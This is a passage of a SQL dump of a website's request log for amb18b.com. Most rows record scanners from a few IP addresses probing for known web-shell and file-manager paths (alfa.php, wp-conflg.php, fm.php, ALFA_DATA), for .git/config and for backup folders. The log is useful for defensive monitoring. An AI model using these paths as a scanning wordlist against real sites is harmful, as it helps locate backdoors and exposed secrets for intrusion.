16:49:48'),(1761,'https://amb18b.com/file15.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:49','2025-10-27 16:49:49'),(1762,'https://amb18b.com/asas.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:50','2025-10-27 16:49:50'),(1763,'https://amb18b.com/520.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:52','2025-10-27 16:49:52'),(1764,'https://amb18b.com/ilex.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:53','2025-10-27 16:49:53'),(1765,'https://amb18b.com/class20.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:54','2025-10-27 16:49:54'),(1766,'https://amb18b.com/an.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:55','2025-10-27 16:49:55'),(1767,'https://amb18b.com/ton.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:56','2025-10-27 16:49:56'),(1768,'https://amb18b.com/file21.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:57','2025-10-27 16:49:57'),(1769,'https://amb18b.com/cool.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:58','2025-10-27 16:49:58'),(1770,'https://amb18b.com/file7.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:59','2025-10-27 16:49:59'),(1771,'https://amb18b.com/classgoto24.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:00','2025-10-27 16:50:00'),(1772,'https://amb18b.com/wlex.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:01','2025-10-27 16:50:01'),(1773,'https://amb18b.com/ahax.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:03','2025-10-27 16:50:03'),(1774,'https://amb18b.com/gel4y.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:04','2025-10-27 16:50:04'),(1775,'https://amb18b.com/file1.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:05','2025-10-27 16:50:05'),(1776,'https://amb18b.com/fffff.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:06','2025-10-27 16:50:06'),(1777,'https://amb18b.com/2.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:07','2025-10-27 16:50:07'),(1778,'https://amb18b.com/file4.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:08','2025-10-27 16:50:08'),(1779,'https://amb18b.com/makeasmtp.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:09','2025-10-27 16:50:09'),(1780,'https://amb18b.com/des.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:10','2025-10-27 16:50:10'),(1781,'https://amb18b.com/alfa.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:11','2025-10-27 16:50:11'),(1782,'https://amb18b.com/222.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:13','2025-10-27 16:50:13'),(1783,'https://amb18b.com/555.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:14','2025-10-27 16:50:14'),(1784,'https://amb18b.com/gifclass4.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:15','2025-10-27 16:50:15'),(1785,'https://amb18b.com/lv.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:16','2025-10-27 16:50:16'),(1786,'https://amb18b.com/abcd.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:17','2025-10-27 16:50:17'),(1787,'https://amb18b.com/wa.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:18','2025-10-27 16:50:18'),(1788,'https://amb18b.com/wp-update.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:19','2025-10-27 16:50:19'),(1789,'https://amb18b.com/2clas.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:20','2025-10-27 16:50:20'),(1790,'https://amb18b.com/030.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:21','2025-10-27 16:50:21'),(1791,'https://amb18b.com/mlex.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:22','2025-10-27 16:50:22'),(1792,'https://amb18b.com/33.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:24','2025-10-27 16:50:24'),(1793,'https://amb18b.com/vee.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:25','2025-10-27 16:50:25'),(1794,'https://amb18b.com/he.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:26','2025-10-27 16:50:26'),(1795,'https://amb18b.com/H.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:27','2025-10-27 16:50:27'),(1796,'https://amb18b.com/filesss.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:28','2025-10-27 16:50:28'),(1797,'https://amb18b.com/ioxi-o2.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:29','2025-10-27 16:50:29'),(1798,'https://amb18b.com/aaa.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:30','2025-10-27 16:50:30'),(1799,'https://amb18b.com/indo.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:31','2025-10-27 16:50:31'),(1800,'https://amb18b.com/vast.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:32','2025-10-27 16:50:32'),(1801,'https://amb18b.com/yellow.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:33','2025-10-27 16:50:33'),(1802,'https://amb18b.com/file18.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:34','2025-10-27 16:50:34'),(1803,'https://amb18b.com/wb.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:35','2025-10-27 16:50:35'),(1804,'https://amb18b.com/aa21.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:36','2025-10-27 16:50:36'),(1805,'https://amb18b.com/ckk.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:37','2025-10-27 16:50:37'),(1806,'https://amb18b.com/111.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:38','2025-10-27 16:50:38'),(1807,'https://amb18b.com/system_log.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:39','2025-10-27 16:50:39'),(1808,'https://amb18b.com/.well-known/acme-challenge/about.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:40','2025-10-27 16:50:40'),(1809,'https://amb18b.com/racs3.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:41','2025-10-27 16:50:41'),(1810,'https://amb18b.com/plss3.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:43','2025-10-27 16:50:43'),(1811,'https://amb18b.com/akpc.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:44','2025-10-27 16:50:44'),(1812,'https://amb18b.com/ffile.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:45','2025-10-27 16:50:45'),(1813,'https://amb18b.com/class19.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:46','2025-10-27 16:50:46'),(1814,'https://amb18b.com/goat.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:47','2025-10-27 16:50:47'),(1815,'https://amb18b.com/inde.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:48','2025-10-27 16:50:48'),(1816,'https://amb18b.com/pm.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:49','2025-10-27 16:50:49'),(1817,'https://amb18b.com/gm.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:50','2025-10-27 16:50:50'),(1818,'https://amb18b.com/sec.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:51','2025-10-27 16:50:51'),(1819,'https://amb18b.com/we.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:53','2025-10-27 16:50:53'),(1820,'https://amb18b.com/file.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:54','2025-10-27 16:50:54'),(1821,'https://amb18b.com/about3.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:55','2025-10-27 16:50:55'),(1822,'https://amb18b.com/thxt.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:56','2025-10-27 16:50:56'),(1823,'https://amb18b.com/file9.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:57','2025-10-27 16:50:57'),(1824,'https://amb18b.com/blex.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:58','2025-10-27 16:50:58'),(1825,'https://amb18b.com/ssss.php','48.218.150.44','Direct Access',1,'2025-10-27 16:50:59','2025-10-27 16:50:59'),(1826,'https://amb18b.com/ut.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:00','2025-10-27 16:51:00'),(1827,'https://amb18b.com/NewFile.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:01','2025-10-27 16:51:01'),(1828,'https://amb18b.com/efile.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:02','2025-10-27 16:51:02'),(1829,'https://amb18b.com/gifclass.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:03','2025-10-27 16:51:03'),(1830,'https://amb18b.com/dove.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:04','2025-10-27 16:51:04'),(1831,'https://amb18b.com/flex.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:06','2025-10-27 16:51:06'),(1832,'https://amb18b.com/lock360.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:07','2025-10-27 16:51:07'),(1833,'https://amb18b.com/CLA.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:08','2025-10-27 16:51:08'),(1834,'https://amb18b.com/jlex3.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:09','2025-10-27 16:51:09'),(1835,'https://amb18b.com/alpa.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:10','2025-10-27 16:51:10'),(1836,'https://amb18b.com/about.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:11','2025-10-27 16:51:11'),(1837,'https://amb18b.com/wfile.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:12','2025-10-27 16:51:12'),(1838,'https://amb18b.com/build.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:13','2025-10-27 16:51:13'),(1839,'https://amb18b.com/ws.php','48.218.150.44','Direct Access',1,'2025-10-27 16:51:14','2025-10-27 16:51:14'),(1840,'https://amb18b.com/sitemap.xml.gz','52.167.144.186','Direct Access',1,'2025-10-27 18:05:00','2025-10-27 18:05:00'),(1841,'https://amb18b.com/.git/config','34.57.193.104','Direct Access',1,'2025-10-27 18:16:20','2025-10-27 18:16:20'),(1842,'https://amb18b.com/wordpress','20.22.194.228','Direct Access',1,'2025-10-27 18:30:57','2025-10-27 18:30:57'),(1843,'https://amb18b.com/wp','20.22.194.228','Direct Access',1,'2025-10-27 18:31:02','2025-10-27 18:31:02'),(1844,'https://amb18b.com/bc','20.22.194.228','Direct Access',1,'2025-10-27 18:31:03','2025-10-27 18:31:03'),(1845,'https://amb18b.com/bk','20.22.194.228','Direct Access',1,'2025-10-27 18:31:05','2025-10-27 18:31:05'),(1846,'https://amb18b.com/backup','20.22.194.228','Direct Access',1,'2025-10-27 18:31:06','2025-10-27 18:31:06'),(1847,'https://amb18b.com/old','20.22.194.228','Direct Access',1,'2025-10-27 18:31:08','2025-10-27 18:31:08'),(1848,'https://amb18b.com/new','20.22.194.228','Direct Access',1,'2025-10-27 18:31:09','2025-10-27 18:31:09'),(1849,'https://amb18b.com/main','20.22.194.228','Direct Access',1,'2025-10-27 18:31:11','2025-10-27 18:31:11'),(1850,'https://amb18b.com/sitemap.xml.gz','40.77.167.51','Direct Access',1,'2025-10-27 19:06:17','2025-10-27 19:06:17'),(1851,'https://amb18b.com/htaccess.php','172.192.51.163','Direct Access',1,'2025-10-27 19:39:59','2025-10-27 19:39:59'),(1852,'https://amb18b.com/readme.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:01','2025-10-27 19:40:01'),(1853,'https://amb18b.com/as.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:03','2025-10-27 19:40:03'),(1854,'https://amb18b.com/rh.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:05','2025-10-27 19:40:05'),(1855,'https://amb18b.com/css.php','172.192.51.163','Direct Access',3,'2025-10-27 19:41:21','2025-10-27 19:40:06'),(1856,'https://amb18b.com/gfile.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:08','2025-10-27 19:40:08'),(1857,'https://amb18b.com/cfile.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:10','2025-10-27 19:40:10'),(1858,'https://amb18b.com/wefile.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:11','2025-10-27 19:40:11'),(1859,'https://amb18b.com/403.php','172.192.51.163','Direct Access',2,'2025-10-27 19:42:30','2025-10-27 19:40:13'),(1860,'https://amb18b.com/max.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:15','2025-10-27 19:40:15'),(1861,'https://amb18b.com/m.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:17','2025-10-27 19:40:17'),(1862,'https://amb18b.com/post.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:18','2025-10-27 19:40:18'),(1863,'https://amb18b.com/themes.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:20','2025-10-27 19:40:20'),(1864,'https://amb18b.com/ALFA_DATA/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:23','2025-10-27 19:40:23'),(1865,'https://amb18b.com/wp-admin/maint/about.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:25','2025-10-27 19:40:25'),(1866,'https://amb18b.com/wp-admin/network/wp-conflg.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:40:27','2025-10-27 19:40:27'),(1867,'https://amb18b.com/click.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:29','2025-10-27 19:40:29'),(1868,'https://amb18b.com/install.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:31','2025-10-27 19:40:31'),(1869,'https://amb18b.com/lv.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:33','2025-10-27 19:40:33'),(1870,'https://amb18b.com/simple.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:36','2025-10-27 19:40:36'),(1871,'https://amb18b.com/13k.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:39','2025-10-27 19:40:39'),(1872,'https://amb18b.com/up.php?x=','172.192.51.163','Direct Access',1,'2025-10-27 19:40:42','2025-10-27 19:40:42'),(1873,'https://amb18b.com/0x1949.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:44','2025-10-27 19:40:44'),(1874,'https://amb18b.com/cong.php','172.192.51.163','Direct Access',2,'2025-10-27 19:41:01','2025-10-27 19:40:47'),(1875,'https://amb18b.com/fw.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:49','2025-10-27 19:40:49'),(1876,'https://amb18b.com/bs1.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:52','2025-10-27 19:40:52'),(1877,'https://amb18b.com/wp-includes/images/wp-login.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:53','2025-10-27 19:40:53'),(1878,'https://amb18b.com/termps.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:55','2025-10-27 19:40:55'),(1879,'https://amb18b.com/brand.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:58','2025-10-27 19:40:58'),(1880,'https://amb18b.com/goods.php','172.192.51.163','Direct Access',1,'2025-10-27 19:40:59','2025-10-27 19:40:59'),(1881,'https://amb18b.com/atomlib.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:03','2025-10-27 19:41:03'),(1882,'https://amb18b.com/w.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:05','2025-10-27 19:41:05'),(1883,'https://amb18b.com/404.php?fm=true','172.192.51.163','Direct Access',1,'2025-10-27 19:41:07','2025-10-27 19:41:07'),(1884,'https://amb18b.com/404.php','172.192.51.163','Direct Access',2,'2025-10-27 19:42:14','2025-10-27 19:41:10'),(1885,'https://amb18b.com/article.php','172.192.51.163','Direct Access',2,'2025-10-27 19:42:23','2025-10-27 19:41:11'),(1886,'https://amb18b.com/0x.php','172.192.51.163','Direct Access',2,'2025-10-27 19:41:36','2025-10-27 19:41:18'),(1887,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/filemanager.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:41:23','2025-10-27 19:41:23'),(1888,'https://amb18b.com/1.php','172.192.51.163','Direct Access',2,'2025-10-27 19:42:28','2025-10-27 19:41:25'),(1889,'https://amb18b.com/admin.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:27','2025-10-27 19:41:27'),(1890,'https://amb18b.com/wp-admin/maint/maint.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:28','2025-10-27 19:41:28'),(1891,'https://amb18b.com/classwithtostring.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:30','2025-10-27 19:41:30'),(1892,'https://amb18b.com/dropdown.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:32','2025-10-27 19:41:32'),(1893,'https://amb18b.com/moon.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:34','2025-10-27 19:41:34'),(1894,'https://amb18b.com/moon.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:41:38','2025-10-27 19:41:38'),(1895,'https://amb18b.com/autoload_classmap.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:41:40','2025-10-27 19:41:40'),(1896,'https://amb18b.com/inputs.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:42','2025-10-27 19:41:42'),(1897,'https://amb18b.com/default.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:44','2025-10-27 19:41:44'),(1898,'https://amb18b.com/fm.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:41:46','2025-10-27 19:41:46'),(1899,'https://amb18b.com/fm.php?fm=true','172.192.51.163','Direct Access',1,'2025-10-27 19:41:48','2025-10-27 19:41:48'),(1900,'https://amb18b.com/about.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:50','2025-10-27 19:41:50'),(1901,'https://amb18b.com/file.php?','172.192.51.163','Direct Access',1,'2025-10-27 19:41:52','2025-10-27 19:41:52'),(1902,'https://amb18b.com/alfa.php','172.192.51.163','Direct Access',2,'2025-10-27 19:42:26','2025-10-27 19:41:54'),(1903,'https://amb18b.com/buy.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:56','2025-10-27 19:41:56'),(1904,'https://amb18b.com/themes/twentytwentytwo/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:41:59','2025-10-27 19:41:59'),(1905,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:42:01','2025-10-27 19:42:01'),(1906,'https://amb18b.com/wp-admin/wp-conflg.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:42:03','2025-10-27 19:42:03'),(1907,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:42:05','2025-10-27 19:42:05'),(1908,'https://amb18b.com/manager.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:42:07','2025-10-27 19:42:07'),(1909,'https://amb18b.com/js/fm.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:09','2025-10-27 19:42:09'),(1910,'https://amb18b.com/item.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:10','2025-10-27 19:42:10'),(1911,'https://amb18b.com/plugins/Cache/footer.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:12','2025-10-27 19:42:12'),(1912,'https://amb18b.com/mail.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:17','2025-10-27 19:42:17'),(1913,'https://amb18b.com/sx.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:19','2025-10-27 19:42:19'),(1914,'https://amb18b.com/wp-admin/maint/admin.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:21','2025-10-27 19:42:21'),(1915,'https://amb18b.com/link.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:32','2025-10-27 19:42:32'),(1916,'https://amb18b.com/byp.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:35','2025-10-27 19:42:35'),(1917,'https://amb18b.com/bak.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:37','2025-10-27 19:42:37'),(1918,'https://amb18b.com/ini.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:39','2025-10-27 19:42:39'),(1919,'https://amb18b.com/ws.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:42','2025-10-27 19:42:42'),(1920,'https://amb18b.com/wp-trackback.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:45','2025-10-27 19:42:45'),(1921,'https://amb18b.com/.well-known/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:48','2025-10-27 19:42:48'),(1922,'https://amb18b.com/wp-includes/certificates/plugins.php','172.192.51.163','Direct Access',1,'2025-10-27 19:42:50','2025-10-27 19:42:50'),(1923,'https://amb18b.com/chosen.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:02','2025-10-27 19:43:02'),(1924,'https://amb18b.com/wp-includes/ID3/about.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:04','2025-10-27 19:43:04'),(1925,'https://amb18b.com/css/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:06','2025-10-27 19:43:06'),(1926,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:43:08','2025-10-27 19:43:08'),(1927,'https://amb18b.com/wp-includes/SimplePie/wp-login.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:10','2025-10-27 19:43:10'),(1928,'https://amb18b.com/filemanager/dialog.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:14','2025-10-27 19:43:14'),(1929,'https://amb18b.com/wp-admin/maint/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:16','2025-10-27 19:43:16'),(1930,'https://amb18b.com/wp-includes/Requests/Text/admin.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:19','2025-10-27 19:43:19'),(1931,'https://amb18b.com/wp-includes/customize/about.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:21','2025-10-27 19:43:21'),(1932,'https://amb18b.com/index/function.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:23','2025-10-27 19:43:23'),(1933,'https://amb18b.com/uploads/autoload_classmap.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:25','2025-10-27 19:43:25'),(1934,'https://amb18b.com/wp-includes/css/dist/preferences/wp-login.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:27','2025-10-27 19:43:27'),(1935,'https://amb18b.com/wp-includes/style-engine/about.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:29','2025-10-27 19:43:29'),(1936,'https://amb18b.com/.well-known/acme-challenge/mariju.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:31','2025-10-27 19:43:31'),(1937,'https://amb18b.com/about/function.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:32','2025-10-27 19:43:32'),(1938,'https://amb18b.com/wp-includes/theme-compat/chosen.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:34','2025-10-27 19:43:34'),(1939,'https://amb18b.com/admin/function.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:36','2025-10-27 19:43:36'),(1940,'https://amb18b.com/.well-known/acme-challenge/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:38','2025-10-27 19:43:38'),(1941,'https://amb18b.com/css/colors/blue/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:40','2025-10-27 19:43:40'),(1942,'https://amb18b.com/wp-admin/setup-config.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:44','2025-10-27 19:43:44'),(1943,'https://amb18b.com/wp-admin/js/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:51','2025-10-27 19:43:51'),(1944,'https://amb18b.com/wp-includes/assets/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:55','2025-10-27 19:43:55'),(1945,'https://amb18b.com/wp-includes/fonts/index.php?p=','172.192.51.163','Direct Access',1,'2025-10-27 19:43:58','2025-10-27 19:43:58'),(1946,'https://amb18b.com/.well-known/gecko-litespeed.php','172.192.51.163','Direct Access',1,'2025-10-27 19:43:59','2025-10-27 19:43:59'),(1947,'https://amb18b.com/.well-known/admin.php','172.192.51.163','Direct Access',1,'2025-10-27 19:44:01','2025-10-27 19:44:01'),(1948,'https://amb18b.com/.well-known/log.php','172.192.51.163','Direct Access',1,'2025-10-27 19:44:09','2025-10-27 19:44:09'),(1949,'https://amb18b.com/class.php','172.192.51.163','Direct Access',1,'2025-10-27 19:44:11','2025-10-27 19:44:11'),(1950,'https://amb18b.com/wp-includes/js/codemirror/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:44:12','2025-10-27 19:44:12'),(1951,'https://amb18b.com/wp-includes/block-patterns/index.php','172.192.51.163','Direct Access',1,'2025-10-27 19:44:14','2025-10-27 19:44:14'),(1952,'https://amb18b.com/.git/config','34.57.193.104','Direct Access',1,'2025-10-27 20:20:52','2025-10-27 20:20:52'),(1953,'https://amb18b.com/.well-known/','13.89.129.89','Direct Access',1,'2025-10-27 21:53:01','2025-10-27 21:53:01'),(1954,'https://amb18b.com/a.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:04','2025-10-27 21:53:04'),(1955,'https://amb18b.com/aa.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:06','2025-10-27 21:53:06'),(1956,'https://amb18b.com/abcd.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:08','2025-10-27 21:53:08'),(1957,'https://amb18b.com/about.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:10','2025-10-27 21:53:10'),(1958,'https://amb18b.com/admin.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:11','2025-10-27 21:53:11'),(1959,'https://amb18b.com/alfa.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:13','2025-10-27 21:53:13'),(1960,'https://amb18b.com/atomlib.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:16','2025-10-27 21:53:16'),(1961,'https://amb18b.com/autoload_classmap.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:17','2025-10-27 21:53:17'),(1962,'https://amb18b.com/buy.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:20','2025-10-27 21:53:20'),(1963,'https://amb18b.com/cgi-bin/index.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:21','2025-10-27 21:53:21'),(1964,'https://amb18b.com/chosen.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:23','2025-10-27 21:53:23'),(1965,'https://amb18b.com/classwithtostring.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:25','2025-10-27 21:53:25'),(1966,'https://amb18b.com/code.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:27','2025-10-27 21:53:27'),(1967,'https://amb18b.com/codex.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:29','2025-10-27 21:53:29'),(1968,'https://amb18b.com/config.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:31','2025-10-27 21:53:31'),(1969,'https://amb18b.com/dropdown.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:32','2025-10-27 21:53:32'),(1970,'https://amb18b.com/edit.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:34','2025-10-27 21:53:34'),(1971,'https://amb18b.com/file.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:36','2025-10-27 21:53:36'),(1972,'https://amb18b.com/file2.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:38','2025-10-27 21:53:38'),(1973,'https://amb18b.com/flower.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:40','2025-10-27 21:53:40'),(1974,'https://amb18b.com/gecko-new.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:42','2025-10-27 21:53:42'),(1975,'https://amb18b.com/goods.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:44','2025-10-27 21:53:44'),(1976,'https://amb18b.com/info.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:45','2025-10-27 21:53:45'),(1977,'https://amb18b.com/info.php/aa.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:47','2025-10-27 21:53:47'),(1978,'https://amb18b.com/install.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:49','2025-10-27 21:53:49'),(1979,'https://amb18b.com/ioxi-o.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:51','2025-10-27 21:53:51'),(1980,'https://amb18b.com/moon.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:53','2025-10-27 21:53:53'),(1981,'https://amb18b.com/test1.php/aa.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:54','2025-10-27 21:53:54'),(1982,'https://amb18b.com/theme.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:56','2025-10-27 21:53:56'),(1983,'https://amb18b.com/w.php','13.89.129.89','Direct Access',1,'2025-10-27 21:53:58','2025-10-27 21:53:58'),(1984,'https://amb18b.com/wp-2019.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:00','2025-10-27 21:54:00'),(1985,'https://amb18b.com/wp-admin.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:02','2025-10-27 21:54:02'),(1986,'https://amb18b.com/wp-admin/ioxi-o.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:06','2025-10-27 21:54:06'),(1987,'https://amb18b.com/wp-includes/ioxi-o.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:10','2025-10-27 21:54:10'),(1988,'https://amb18b.com/wp-admin/ab.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:12','2025-10-27 21:54:12'),(1989,'https://amb18b.com/wp-admin/alfa.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:14','2025-10-27 